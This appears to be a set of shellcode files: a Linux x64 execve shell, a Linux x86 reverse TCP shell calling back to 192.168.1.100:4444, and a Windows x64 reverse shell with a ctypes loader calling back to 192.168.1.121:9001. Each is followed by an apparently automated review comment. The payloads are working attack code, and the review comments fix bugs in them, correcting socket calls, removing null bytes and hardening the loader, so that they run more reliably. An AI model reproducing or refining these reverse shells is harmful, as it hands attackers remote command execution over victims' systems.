; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
; [Length] : 36
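Review bot: The 36-byte string on the `; Shellcode:` line contains twelve `\x00` bytes (one padding the 7-byte `mov r10` immediate, three in `mov rax, 0x3b`, four each in `mov rsi, 0` and `mov rdx, 0`), so the payload is cut off by any strcpy/strcat-style sink, and the header does not warn that it is not null-free. Because rax is already zero from the `xor rax, rax`, `mov al, 0x3b` is sufficient, `xor rsi, rsi` / `xor rdx, rdx` replace the two `mov ..., 0`, and an 8-byte `//bin/sh` immediate (`0x68732f6e69622f2f`) removes the remaining null while the earlier `push rax` still supplies the string terminator. The `; Shellcode:` byte dump and the `; [Length]` line then have to be regenerated from the reassembled object; by my count the result is 29 bytes, but that should be confirmed with objdump.
```nasm
; … unchanged: xor rax, rax / push rax …
mov r10, 0x68732f6e69622f2f   ; "//bin/sh": 8 bytes, no null padding
push r10
mov rdi, rsp
mov al, 0x3b                  ; rax already zeroed above
xor rsi, rsi                  ; argv = NULL
xor rdx, rdx                  ; envp = NULL
syscall
```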


@ -0,0 +1,43 @@
/*
# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
# Date: 2025-04-06
# Exploit Author: Al Baradi Joy
# Platform: Linux x86
# Type: Shellcode
# Shellcode Length: 95 bytes
# Tested On: Kali Linux x86
# Connect-Back IP: 192.168.1.100
# Connect-Back Port: 4444
Description:
This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
Usage:
Start a netcat listener on your attacking machine:
nc -lvnp 4444
Compile and run on the target machine:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
./shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers
"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall
"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100
"\x66\x68\x11\x5c" // push port 4444
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect
"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop
"\xcd\x80\x49\x79\xf9"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh")
int main() {
printf("Shellcode Length: %zu\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
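Review bot: The socket() step can never succeed: ebx is zeroed on the first line and nothing sets it before the first `\xcd\x80`, so socketcall runs with call number 0 while SYS_SOCKET is 1 and returns -EINVAL, which `\x89\xc6` then carries into esi as the "descriptor" used by connect and the dup2 loop (only the later connect sets `\xb3\x03`). The second line should become `"\x50\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xb0\x66" // socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, 0})`. The execve path is also not NUL-terminated, since `/bin//sh` is pushed directly on top of the connect arguments and the four bytes after `sh` are the sockfd value pushed for connect, so that line should read `"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" // NUL terminator, then "/bin//sh"`. By my count the string holds 80 bytes rather than the 95 stated in the header, so the length should be re-measured after the fix, and on a 64-bit Kali the documented `gcc` line will need `-m32` to build this 32-bit payload.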


@ -0,0 +1,335 @@
#!/usr/bin/python
#
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.
import ctypes, struct
from ctypes import wintypes
from keystone import *
CODE = (
'''
start:
mov rbp, rsp
sub rsp, 1600
resolve_kernel32:
mov dl, 0x4b # dl = 'K'
mov rcx, 0x60 #
mov r8, gs:[rcx] # R8 = address of PEB
mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA
mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
xor rcx, rcx
mov rbx, [rdi + 0x10] # RBX = DllBase
mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer
mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY
cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL
jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching
cmp [rsi], dl # Compare the first UNICODE char with 'K'
jne search # If the first UNICODE char is not 'K', continue searching
find_function_jmp:
jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr
get_find_function_addr:
pop rsi # The address of find_function is popped in RSI
mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8)
jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols
callback:
call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
# This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
find_function:
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call find_function", see below)
# QWORD: Number of hash bytes + 8 <- RSP
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000
#---------------------------------------------------------------------------
add rsp, 8 # Point RSP to (Number of hash bytes + 8)
pop rax # RAX = Number of hash bytes + 8
push -1 # Write -1 on the stack instead of (Number of hash bytes + 8)
add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000 <- RSP
#---------------------------------------------------------------------------
find_function_loop2:
xor rax, rax
xor rdi, rdi
mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew
mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
add rdi, rbx # RDI = VMA of the Export Directory Table of the module
mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module)
mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
add rax, rbx # EAX = VMA of AddressOfNames
mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else
find_function_loop:
dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name
mov rax, [rbp - 8] # EAX = VMA of AddressOfNames
mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name
add rsi, rbx # RSI = VMA of the current Symbol Name
compute_hash:
xor rax, rax # EAX = 0
cdq # If the MSB of EAX = 1: EDX = 0x11111111
# If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
# In this case, EDX = 0x00000000 because EAX = 0x00000000
compute_hash_repeat:
ror edx, 0xd # Right-shift EDX of 13 bits
add edx, eax # EDX += current EAX value
lodsb # Load the byte pointed by ESI into AL
test al, al # Test if the NULL terminator of the Symbol Name has been reached
jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
# Else, perform the next iteration of the hash-computation algorithm
# At this point, EDX contains the computed hash of the current symbol
find_function_compare:
cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol
jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
# If ZF = 1, the hash is equal: symbol found: continue hereby
mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array
add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array
mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX)
mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array
add rdx, rbx # RDX = VMA of the AddressOfFunctions array
mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
add rax, rbx # EAX = VMA of the wanted symbol
push rax # Push the wanted symbol's VMA onto the stack:
# ATTENTION: The symbol's VMA overwrites its Hash on the stack!
mov rax, [rsp - 8]
cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping
find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
sub rsp, 16 # Point RSP to the Return Address of find_function
ret # Return
resolve_k32_sym:
mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA
push rax
mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA
push rax
mov rax, 0x0000000078b5b983 # Hash of TerminateProcess
push rax
mov rax, 32 # Push 32 onto the stack
push rax
call [rbp + 8] # Call to find_function (see find_function above)
load_ws2_32:
mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed)
push rax
mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed)
push rax
mov rcx, rsp # Paramter 1 = address of "ws2_32.dll"
sub rsp, 40 # Create 40 bytes of room on the stack
call [rsp + 80] # Call LoadLibraryA
nop
resolve_ws2_sym:
mov rbx, rax # RBX = Base Address of ws2_32.dll
mov rax, 0x0000000060aaf9ec # Hash of connect
push rax
mov rax, 0x00000000adf509d9 # Hash of WSASocketA
push rax
mov rax, 0x000000003bfcedcb # Hash of WSAStartup
push rax
mov rax, 32
push rax # Push 32 (Number of Hashes pushed + 8)
call [rbp + 8] # Call find_function
sub rsp, 512
call_WSAStartup:
mov rcx, 0x202 # RCX = WinSock Version 2.2
lea rdx, [rsp + 800] # RDX = Address of output WSAData structure
call [rsp + 520] # Call WSAStartup
call_WSASocketA:
mov rcx, 2 # Parameter af = 2 (AF_INET)
mov rdx, 1 # Parameter type = 1
mov r8, 6 # Parameter protocol = 6 (TCP)
xor r9, r9 # Parameter lpProtocolInfo = 0
mov [rsp + 32], r9 # Parameter dwFlags = 0
mov [rsp + 40], r9 # Parameter g = 0
call [rsp + 528] # Call WSASocketA
call_connect:
mov rsi, rax # Save socket fd in RSI
mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA
mov r8, 16 # R8 = Parameter namelen = 16
# Preparation of the sockaddr_in structure on the stack:
# struct sockaddr_in {
# QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
# QWORD: sin_zero = [00000000 00000000]
# }
mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in
mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family
xor r9, r9
mov [rdx + 8], r9 # Write field sin_zero
call [rsp + 536] # Call connect
# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
create_STARTUPINFOA:
lea rdi, [rsp + 800]
add rdi, 0x300
mov rbx, rdi
xor eax, eax
mov ecx, 0x20
rep stosd # Zero-out 0x80 bytes
mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68
mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
mov eax, 0x100 # EAX = STARTF_USESTDHANDLES
mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd
mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd
mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd
# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
call_CreateProccessA:
xor rax, rax
xor rcx, rcx # Parameter lpApplicationName = 0
lea rdx, [rsp + 800] # Parameter lpCommandLine
add rdx, 0x180
mov eax, 0x646d63 # EAX = "cmd"
mov [rdx], rax # Write "cmd" in the lpCommandLine parameter
xor r8, r8 # Parameter lpProcessAttributes = 0
xor r9, r9 # Parameter lpThreadAttributes = 0
xor rax, rax
inc eax
mov [rsp + 0x20], rax # Parameter bInheritHandles = 1
dec eax
mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0
mov [rsp + 0x30], rax # Parameter lpEnvironment = 0
mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0
mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO
add rbx, 0x68
mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO
call [rsp + 616]
call_TerminateProcess:
xor rcx, rcx
dec rcx # Parameter hProcess = -1 = this process
xor rdx, rdx # Parameter uExitCode = 0 (graceful termination)
int3
call [rsp + 608] # Call TerminateProcess
'''
)
# Initialize engine in 64-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
instructions = ""
for dec in encoding:
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
print("Opcodes = (\"" + instructions + "\")")
print(f"Size: {len(encoding)} bytes.")
# E
# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
_fields_ = [
("wVersion", wintypes.WORD),
("wHighVersion", wintypes.WORD),
("szDescription", wintypes.CHAR * 257),
("szSystemStatus", wintypes.CHAR * 129),
("iMaxSockets", wintypes.UINT),
("iMaxUdpDg", wintypes.UINT),
("lpVendorInfo", ctypes.POINTER(ctypes.c_char))
]
# Load the Winsock library
ws2_32 = ctypes.windll.ws2_32
# Define the WSAStartup function prototype
# WSAStartup takes two arguments:
# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2)
# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation
ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
ws2_32.WSAStartup.restype = wintypes.INT
def call_wsastartup():
# Request version 2.2 (0x0202)
version_requested = 0x0202
# Create an instance of WSADATA to hold the output
wsadata = WSADATA()
# Call WSAStartup
result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
if result != 0:
raise RuntimeError(f"WSAStartup failed with error code {result}")
print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}")
return wsadata
call_wsastartup()
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
# Alloco memoria eseguibile per lo shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Metto lo shellcode nel buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# Copio lo shellcode nella memoria allocata
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")
# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
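Review bot: The `int3` at `call_TerminateProcess` is a leftover debugger breakpoint that ships inside the 564-byte payload; with no debugger attached it raises EXCEPTION_BREAKPOINT and the host process dies on an unhandled exception (typically with WER/crash-dump noise) instead of reaching the TerminateProcess call that the comment describes as graceful termination, so that line should be deleted and the size in the header regenerated. Separately, the loader harness never sets a `restype` on `VirtualAlloc`, so the returned 64-bit address is truncated to a 32-bit `c_int` and then re-wrapped as `ctypes.c_int(ptr)` for `RtlMoveMemory` and `CreateThread`; this only works because a fixed base of `0x10000000` is requested, and if that range is unavailable VirtualAlloc returns NULL, which is never checked before the copy. A robust harness sets `ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p`, passes `None` as the base so the allocator chooses, and aborts with `if not ptr: raise OSError("VirtualAlloc failed")` before writing. The comment `# Preparation of WSAStartup (not included in the shellcode)` also contradicts the `call_WSAStartup` label inside the shellcode itself and should be corrected or the host-side WSAStartup call removed.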